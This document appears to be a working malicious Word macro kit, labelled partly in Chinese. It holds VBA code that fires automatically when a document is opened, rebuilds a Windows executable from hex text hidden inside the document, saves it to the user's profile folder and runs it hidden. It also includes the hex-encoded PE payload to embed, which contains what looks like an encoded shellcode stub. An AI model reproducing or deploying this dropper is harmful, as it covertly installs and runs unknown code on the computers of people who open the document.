&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H64&HC3&HB9&H84&HDA&H22&HCD&HBF&HE4&HBE&H2B&H32&H14&H8F&HA0&HD4&HA3&H3D&HC3&HC6&HB0&H60&H76&HAC&HF0&H2E&H67&HBA&H25&HD8&H54&HEA&H7D&H75&H8F&H82&H2D&H43&HE4&H5E&HC2&H52&H1F&H3E&H84&HDB&H5B&H22&H38&H0C&HAE&HE9&HC7&HB7

宏的代码
Sub Auto_Open()
        Etujg12
End Sub

Sub Etujg12()
        Dim Etujg7 As Integer
        Dim Etujg1 As String
        Dim Etujg2 As String
        Dim Etujg3 As Integer
        Dim Etujg4 As Paragraph
        Dim Etujg8 As Integer
        Dim Etujg9 As Boolean
        Dim Etujg5 As Integer
        Dim Etujg11 As String
        Dim Etujg6 As Byte
        Dim Eaqyiqqonl as String
        Eaqyiqqonl = "Eaqyiqqonl"
        Etujg1 = "BnOINmLy.exe"
        Etujg2 = Environ("USERPROFILE")
        ChDrive (Etujg2)
        ChDir (Etujg2)
        Etujg3 = FreeFile()
        Open Etujg1 For Binary As Etujg3
        For Each Etujg4 in ActiveDocument.Paragraphs
                DoEvents
                        Etujg11 = Etujg4.Range.Text
                If (Etujg9 = True) Then
                        Etujg8 = 1
                        While (Etujg8 < Len(Etujg11))
                                Etujg6 = Mid(Etujg11,Etujg8,4)
                                Put #Etujg3, , Etujg6
                                Etujg8 = Etujg8 + 4
                        Wend
                ElseIf (InStr(1,Etujg11,Eaqyiqqonl) > 0 And Len(Etujg11) > 0) Then
                        Etujg9 = True
                End If
        Next
        Close #Etujg3
        Etujg13(Etujg1)
End Sub

Sub Etujg13(Etujg10 As String)
        Dim Etujg7 As Integer
        Dim Etujg2 As String
        Etujg2 = Environ("USERPROFILE")
        ChDrive (Etujg2)
        ChDir (Etujg2)
        Etujg7 = Shell(Etujg10, vbHide)
End Sub

Sub AutoOpen()
        Auto_Open
End Sub

Sub Workbook_Open()
        Auto_Open
End Sub

payload
放word文档中
Eaqyiqqonl
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H22&HFC&H3A&HEA&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HBF&H38&H3A&H79&H9A&HDB&HDE&HD9&H74&H24&HF4&H5A&H33&HC9&H66&HB9&H04&H02&H31&H7A&H15&H83&HC2&H04&H03&H7A&H29&HD8&H8C&HAB&H89&H74&H67&HDC&H49&H85&H13&H23&H79&HE1&H52&HFB&HC7&H43&H7C&H2B&H39&H4F&HAB&H0A&H31&H4B&HA0&HF0&H90&H5A&HF9&H9D&H61&H99&HFE&H90&H10&H2D&HFC&HA7&H7F&HCB&H20&H9C&H0B&H0F&H9D&HD1&H81&H24&HC2&HC4&HF6&H71&H06&H14&H52&HC7&H82&H4C&HF4&H74&HE5&H83&H47&HB9&HB9&H4F&HB4&H55&H41&HB4&H51&H8D&HAB&HE5&H70&HFD&H3B&HF7&HB9&H8A&H62&HD8&H4D&H88&H6E&H4B&HA4&H49&HD8&HAD&H3F&H16&H63&HBC&HB6&H74&H06&H7F&HAD&HB5&H34&H6D&H7F&HB6&HAD&HD1&HC1&H86&HB7&H06&HDB&H3B&HCD&H66&H30&HDC&HB3&HA1&H46&H0D&H1E&HAC&HF9&H70&HD8&HC3&H59&HD0&HE2&H7C&HC6&H44&H75&H26&H53&H04&HE0&H7C&H3F&H39&HEF&H13&H46&H5A&HC1&HD6&H28&H1D&H60&HEE&HA6&HD2&H22&H4B&HF1&H20&H15&HB7&HEF&H1A&HB3&H2F&H3F&H84&HF6&HA0&HBD&H80&H08&H7C&H29&H0A&H9B&H67&HEE&H72&HD4&H4C&H40&HA5&H0B&H94&H99&H23&HE1&H57&H59&HD6&HC9&H03&HEA&H77&HF7&H40&H47&H63&H4B&H9B&H99&H51&H8E&H4D&HBB&H50&H02&HCF&HDC&H64&H71&H2E&H71&H97&HB3&HEC&H25&H1D&H4E&H33&H96&H47&HB9&H28&HA5&H20&H23&HA5&H61&HD4&HBC&H3B&H98&HDA&H57&H09&H40&H6D&H91&HDC&H1D&H4C&H06&H5B&H8D&H72&HCE&HCF&H52&HA7&HBC&H35&H96&H64&H5C&H0D&H35&HF6&H99&H27&H49&HD0&H73&H17&HCC&H7B&H4A&H7A&H3A&H61&HA6&HF1&H80&H7C&H53&H57&H32&HC3&H7A&H10&HFE&HE2&HD1&HC7&H89&HCE&H4F&HB3&H62&H14&HEA&HDF&H3B&H09&HE3&HE3&H06&H35&H8E&H80&H15&H0A&HDA&HF4&H6C&H19&H9F&HC4&H7C&H9A&HE1&H25&H62&H0B&H25&HA4&H14&H6D&HF4&H2F&HAC&H6E&HD8&HE3&HA4&HE2&H6C&HBC&H15&HB0&HF9&HE6&H32&H65&H39&H82&H3D&HEB&H5C&H10&HD1&H7D&H29&H4C&HD5&H42&HF8&HD6&HF5&H8B&H72&H5E&H0A&H47&H38&H0B&H92&H39&HF1&HED&H28&H84&HC0&H52&HF5&H7D&H49&HF1&H74&H63&H55&H4A&HA7&H38&H4C&H18&H90&H1D&H32&H12&H7A&HCE&HCE&H8F&HEA&H15&HBE&HDC&H2B&H01&H71&H02&HB8&H3A&HBF&H20&H38&HFB&HE6&H82&H35&H7D&H49&HCE&H41&HC7&HE2&H2C&HE5&H89&HF0&HA6&H16&H5D&HDB&H1C&HC9&H98&H17&HCB&H96&H31&H76&H1E&HDE&HE1&H48&HF9&H81&H7E&H6E&H39&H08&H81&HB0&H83&H61&H1F&H73&HB8&H9F&HAB&H32&H4A&HB7&H15&H3B&H86&H42&HD3&HC9&HAD&HCF&H1F&H1A&HBE&H1B&H10&H45&H90&H3C&HD3&H66&HB3&HCB&HB0&H71&HA3&H7F&HFD&HAA&H85&H83&HD0&H4B&HA9&H3D&H74&H5F&H14&H88&HC9&HBD&HE6&HF6&H8B&H34&H0D&H14&HEB&HC8&H95&H2E&H18&H83&HFB&H44&HD4&HDC&H95&H04&HBE&HD9&HF9&HF7&HB1&H2F&HAE&H2C&H79&H82&HFD&HB7&H93&H14&H65&HFC&H59&H0C&H2B&HA7&H09&H1D&H23&H64&H16&H14&H2C&H41&H92&HBF&H14&H93&HFF&H53&H6A&H47&HA4&HB6&HE6&HA7&HE4&H1D&H3C&H99&H04&HA4&HD8&H9D&H90&H66&HEF&H29&H7C&H19&H57&HA3&H61&H34&HEC&H5E&H96&HCA&HBF&H4C&H3F&HF0&HC2&H00&H73&H48&HBF&HF6&H5B&H4B&H6A&H93&H42&HCE&H0F&HEB&H1A&H84&HE4&HC6&H90&H6B&H5C&H0E&HDA&H00&H57&H00&HE4&HBD&HC9&H90&H73&H03&H89&H01&H8D&H86&HDB&H94&HE0&HBC&H3A&HBA&HE5&H1A&H79&H70&H1F&HD8&H6A&H89&HFC&H36&H5F&H2E&HE9&H03&HB4&H1B&H61&HC1&HEB&HD5&HE5&H73&HBC&H2C&H4E&HD2&H8F&H7D&HDA&H73&H0C&HEA&HA4&H17&HDE&H0E&HFA&H3B&H2B&HA3&HE5&HC0&H7A&H54&H1C&H56&HC7&H57&H6A&H71&H9D&H08&H85&H6E&H92&H39&H49&HDD&H7C&H8A&HD2&HB8&HFF&H19&HA9&H9F&HF2&HE8&H7E&HB9&H33&HFF&H35&H1D&H66&H51&H97&H98&H4E&H7D&H6F&H27&H4C&HBC&HFD&HCB&H15&H60&H3B&H04&H4F&H32&HD3&HFB&H6E&H0D&HED&H79&H75&HF3&HE7&HDB&H76&H4B&H18&H13&H68&HEB&H4E&HAF&HFF&H5B&H21&H90&H10&HEB&HEF&H3A&HC8&H17&H96&H42&H22&HB9&H48&HD3&H3E&H62&HE4&H54&H69&H83&H1F&HA3&H22&H02&H56&H1F&H09&H80&H97&H53&H3E&H3B&H4E&H7B&HB7&HE3&H7F&HDC&H44&HCE&H65&H71&H59&H52&HD2&H85&H0E&H09&H01&HFB&H75&H0E&H1F&H91&H60&H57&HED&H60&H94&H0F&H47&H20&H05&H8A&HC9&HFA&HF5&H68&H11&HA7&HD9&H0B&H30&H5A&H91&H92&HFC&H28&H94&H83&H84&H9F&H08&HB5&H1C&HD1&H35&HCA&H98&H94&HEE&HBB&HCB&HF9&HBD&H40&HC9&HBE&H3F&H01&H05&HC6&H99&H8A&H0D&H7A&HB1&H5E&H77&H6D&H22&HD4&H06&H26&HFB&HB0&HEC&H5B&H68&HA6&H56&H0E&H32&H97&H2C&H17&H68&H57&HB3&H31&H3C&HCB&H3D&H3A&HA0&H2A&H15&H05&H83&HE7&HAB&H81&H4F&H19&H72&H4A&HC9&H09&H1C&H1E&H25&H56&HBE&H69&H28&H5A&H21&HD6&H07&H33&HC6&HBB&H0A&H74&HF1&HB2&HBA&H48&HE8&H6D&HC0&H80&H1A&HB6&H33&H81&HAA&H26&HC8&H5E&H72&HB7&H34&H82&H99&H8A&H7E&HAC&H31&HB9&HD7&H62&H4E&H97&H9F&H6B&HB6&H23&H0B&HC7&HB0&HB4&H83&H60&H68&H74&HBA&H2D&H89&HA0&H21&H83&HCF&H2C&HE1&H04&H52&HBF&HDD&H6E&HDA&H56&H5F&H77&H0B&H33&HC3&H54&H9C&HA2
&HC9&HE6&H90&H5B&H88&HD5&H13&H1E&H98&H31&H2F&HD4&H67&HFE&HD4&H55&HAD&H0B&HA1&H61&HAD&HC0&HEA&H68&HA3&H77&H06&HE2&H48&HE7&HE1&H92&H9B&HC2&HBA&H35&HB7&HA5&H3B&H07&H5B&H6F&H6D&H4E&HEE&H22&H5F&H7E&HEE&H82&H37&H25&HD8&HB9&HB3&H53&H99&H51&HB9&H88&HBE&H6D&H00&H55&H86&H4B&H26&H7C&H20&HD5&H36&HE3&H40&H50&HAD&H08&HD6&H53&H84&H96&H6E&H84&HEF&H63&H5B&HEC&HF2&H31&HB0&H49&H43&HEE&HAF&H00&H6E&H6D&HE8&HDC&H1A&H8E&H46&H97&HE3&HE1&H4B&H33&H2D&H5B&H61&HEF&H09&H9A&H22&H94&H6B&HED&H7A&H4D&HD4&H91&H0B&H52&H9A&H48&H7C&H1C&H23&H0E&HB6&HED&H6E&HF8&H05&H6A&HA9&H6D&HE9&HCF&H97&H07&HC0&H6C&HC1&H59&H3F&H51&H0D&HAA&HAF&H49&H87&H2F&H5A&H70&H1C&HF4&H47&H4D&HF3&H0C&HBA&HC1&HFA&H7D&H51&H7C&H92&H52&H49&HD2&H31&HC0&HB6&H90&H42&HDF&HE3&H57&H57&H0C&HD8&H80&HB2&H0C&H36&H84&HEF&H2E&H1A&HED&H93&H1D&HD4&H42&HC1&H3B&HB6&H41&HDD&H79&H04&H2D&H1D&H0A&H37&H8A&HE9&HB4&HAA&HDA&H54&H7E&H80&H4F&H4C&H01&HD6&H61&H50&HF5&HDD&HBF&H01&H9B&HCE&H94&HBE&H33&HF0&HA4&H0E&H23&H10&HDF&HED&H40&H4C&HBD&HA3&H1E&H34&HD9&HDD&HC0&H81&H40&H05&H0A&H88&H3F&HFD&H18&H18&H2B&H21&HBB&H99&H39&H4D&H30&H32&H69&H06&HC5&H3F&HBB&HD7&HC4&HFF&H85&H1D&H45&HC7&H61&HF4&H49&H75&H03&HC2&HCA&HCC&H90&H8F&H8D&HB3&H14&HC0&H12&HCA&H1F&H00&H3C&HD8&HAC&H55&HE8&H1B&H0C&H53&HCA&H1F&H02&H4F&H7A&H28&HC1&HAC&H7F&H26&H1D&H9E&HB8&H4A&H5F&H87&HDB&HA6&HDE&H8D&H5D&H5D&H55&HE8&HAE&H51&H8F&H28&H8E&H8A&H9D&HB7&H51&HDC&HDF&H09&H14&HB8&H33&H8B&H55&H86&HB8&HB5&HD6&H8D&H1D&HD4&H18&H17&HFF&HC8&HF6&H1F&HF4&HC0&H85&H19&H3B&H9F&H18&HEE&HAC&H17&H00&H67&H3A&H50&H4C&HE0&HFF&H1C&HD7&H63&H2B&HB3&H33&HF3&H12&HDB&HCB&HA0&H06&H15&H22&H32&HFC&H2E&H03&H02&H11&H34&H4D&HDB&H1F&H39&H46&H81&H5C&HF7&HEC&HBE&HB6&H93&HEE&H0C&HB6&H6F&H53&HA4&HB4&H9E&H94&H1F&H84&H36&H04&H20&HC4&H10&H9A&H53&H0B&HC3&H1D&HD2&H0F&HAF&H49&H61&H8B&HA9&H4D&HD2&H81&H0E&H97&H2E&HFE&H6E&H57&HF4&H47&HC5&H5D&H96&HD5&HFD&H6A&H3D&H14&HA7&HB9&HB5&HD1&HC5&H06&H47&HA2&H3F&H54&H90&H06&H49&HD4&H5A&H3B&HC5&HA7&H6B&HB5&H06&H5A&HC4&HD7&HE8&H88&H5A&H66&HC5&H02&H44&H5F&H3B&H73&H92&HC1&HFD&H20&H03&H14&H1E&H01&H24&H23&HA0&HDE&HAB&H46&H32&H79&HEF&HAE&HA3&H6A&H13&HB1&H52&H4C&HF8&H4D&H94&HC0&HCC&HEF&H0A&HAB&H3D&H89&H24&HA2&H8D&HE5&H67&H17&HA9&H9C&H11&HA6&H27&H99&H7E&H03&H30&HBC&HDF&H6D&H20&H82&H45&HA7&HF8&H62&H30&HBA&H13&HA9&H7B&H53&HB7&H7B&H84&HE5&HA0&H31&H9E&H35&H56&H68&H9C&H07&H54&HDD&H45&H32&H2F&H30&H3A&HB7&H74&H43&HC6&H64&HCD&H2F&HEB&H88&HD5&H6B&H04&HD3&HF3&HD7&H03&H80&H95&HCC&H89&HBE&HCA&HEE&HEB&HEA&HBB&HA6&HA0&H7C&HDB&HF5&HB4&H32&H4A&H58&HD7&H9B&H06&H0C&HA2&HBC&HA2&H88&HDE&HBC&H7E&H68&H4A&H8C&H53&H89&H3E&H09&HD3&H16&HC5&H32&H2D&H5B&H46&H6A&HC7&H81&H02&H24&H65&H38&H38&HE6&H4B&H7D&H70&H5A&HA3&HEC&H67&H2F&H83&H20&HB9&HE4&HD5&H42&HE7&H0B&HF9&H99&H3D&HF8&HDA&HFF&HEC&H88&H6B&HC3&H9D&HF8&HB7&H5E&HED&H52&HC6&H9D&HE6&H78&HF1&H6F&H89&H5E&H2C&H47&H5F&H4C&H4F&HA2&H39&HB0&HCD&HE9&H0F&H44&H05&H9E&HCD&H0B&HEE&H13&HE7&HFA&HE0&H91&H03&HAA&H97&H83&H45&H1F&H7E&H02&H81&H73&H07&H76&H92&H9D&HCF&H42&HFC&H94&H37&HC6&H59&H4B&HDF&H44&H96&HFD&H68&H99&H2E&HC1&H9A&HF4&H9F&H0C&H78&H51&H8A&HE3&H29&H92&H60&H2B&H1D&HEC&H53&HD1&H92&H46&HC7&H97&H90&H5F&H95&H31&H24&HD4&HC3&HAD&H45&HAA&H53&H70&H49&H61&H39&HB9&H65&H25&HF7&H98&H0C&H68&HCF&H3F&HE5&H05&HDF&HAB&H01&H03&H10&H77&HF9&H27&HCE&H99&H49&HA4&H11&H2E&HD3&HBA&H33&HA7&HC7&HD1&H46&H0B&H2C&H31&HD9&H5F&H87&H76&HCC&H35&H03&H01&HB6&HC3&H21&HFC&H86&HAD&H9B&HE7&H95&H89&HA5&H21&HFB&HC9&HA2&H13&H6B&H21&H33&H16&H56&H23&H9E&HCA&H61&HBB&H61&H74&H76&H5B&H3B&HC5&HB2&HEB&HA8&H2E&H32&HD6&H8D&HD1&HDF&HDD&H31&H10&H54&H43&H33&H24&H60&H93&H0D&HE7&H5B&HEE&H58&H3D&H83&H7F&H4A&H90&H3C&HA9&HD6&H4C&HF4&H19&HE8&H7E&H88&H83&H2D&HA5&HB2&H83&H68&HD8&H6B&HD0&H8E&HA2&HF7&HD8&HC0&HDA&H26&H2C&H69&H39&H9A&H84&H75&H50&HBB&HB9&HA2&H0D&H1F&H43&HCE&H57&H18&H57&H74&HB6&HB9&HA5&HD6&HA7&H26&HBF&HC3&HF0&HB1&HFA&H81&HAA&HCB&HA3&H96&H91&HEA&H1D&HE8&H1C&H42&HA6&H8D&H78&H11&H58&H7D&H02&HD6&H8C&H65&HA3&H27&HCC&H1B&HDA&H2E&H70&HF4&HEA&H0B&H8E&HEC&H97&H8E&HE5&HF5&H22&H07&H10&H22&H93&H9E&H94&H76&H24&H44&HEE&H95&HD8&H0E&HEB&H34&HA3&HFB&H79&H11&H5A&HEB&H0D&H20&H7F&H6F&HD5&HE6&H51&H07&H7E&H9B&H92&H38&HA6&HC7&HFA&HF2&H08&HC1&HA3&HD6&HD8&HBB&HE1&H9E&HC5&H5F&H53&H0D&HB5&HD9&H9D&H9C&HCC&HE5&H46&H16&HC4&H81&H76&H83&HBE&H7D&H16&H15&HC8&H9B&H0C&H52&HF1&H9E&H57&HB4&H01&HE6&H7F&HAA&H5B&H09&H32&H7A&H55&H28&HD1&H1A&HD4&H79&H87&HFA&H08&HFE&HB2&HDB&H34&H96&H39&HAD&HC4&H48&H4D&HD4&HBB&HF8&H6D&HBE&HF6&H4F&H0E&H33&HEE&H62&H76&HFB&HBF&H37&HD8&H5B&H03&H47&H84&H7C&HBA&H37&H76&HF2&HE7&HAE&H63&H9B&HDF&H67&H54&H95&H1F&HD6&HC7&H6E&HAD&HBD&HCE&H47&H63&H03&H4F&HE3&HFC&HCF&H87&HE6&H51&H14&H0F&H42&HC4&HE5&H09&HDC&H60&HB7&H90&HEB&H3F&H61&HFD&HFE&H51&H2D&HE8&HE5&H42&HBB&H01&H4F&HA3&H0B&HCA&H27&H25&HE1&H0F&HEB&H28&H03&H01&H70&H2E&HCB&H6E&H60&HF0&H63&H2D&H7E&H70&HEE&H66&HB2&H14&HE5&H73&HE8&H27&HC3&H1B&HC3&H9B&H9E&HAA&H8A&H8B&H8C&H2F&H81&H3D&H65&H19&H69&HB8&H86&HF7&HCE&H12&H4A&H34&H95&HA6&H77&H54&H6B&H58&H52&H71&H1A&H72&HC5&HA1&H5F&H75&H1E&H1D&HAC&HED&H05&H1E&H7E&H68&HF4&HCA&HF5&H4F&HEE&H87&H2B&H5F&HF0&HF4&HF6&H72&H2D&HF8&HED&HBF&H02&HB2&H38&H3F&H88&H49&HBA&HDD&HA1&HE1&H92&H37&HC9&HD8&H4A&H5F&H7D&HDF&HA1&HA2&HCC&H74&H7A&HC7&HFC&H7A&HDB&HF5&HE3&H7F&HFE&HA9&HCB&H61&H11&H0C&H33&H9A&HB3&H2B&HA3&H19&H49&H79&HF7&H5A&H93&HD5&HE9&H1E&HFC&HAC&H51&H6C&HD7&H1C&HF7&HE5&H6B&H82&H29&HC9&H2C&H65&HA6&HA6&HC2&H09&H25&H33&H70&H10&H08&H2C&H2D&H4F&H24&HED&HF0&HEA&HE9&H4C&HBB&H5C&H52&H66&H73&HDB&HFF&H59&H3C&H20&HD8&H39&HD6&H57&H8F&HF4&H9B&H1B&HD0&H85&H72&H09&HA0&H29&H51&H57&H3A&H4A&H43&H55&H32&H02&HF0&H6F&H58&H28&H54&H79&HA4&H5F&HCA&HD8&HE4&H0F&H93&HC6&H4C&HF4&HF5&H1E&H64&H2D&H09&HBE&H04&H75&H30&H40&H02&H20&H10&H07&HEC&HBF&HD6&H5D&H85&HA3&HC0&HAB&H09&HEE&H94&HF2&H40&HDD&H06&HF7&H47&H9D&HDE&HE6&H2D&HAD&H8B&HA7&H33&H90&HA9&HB2&H5F&H9E&H49&H9E&HBE&H4F&HBE&HE7&H05&H8E&H8F&HCE&HFA&HAF&H7D&H81&HC0&HFA&HCC&H05&H91&H1D&H19&HCB&H23&H6C&HE0&HDE&HE7&H19&H16&H54&H7F&HC8&HA7&HCF&H58&H2C&HD1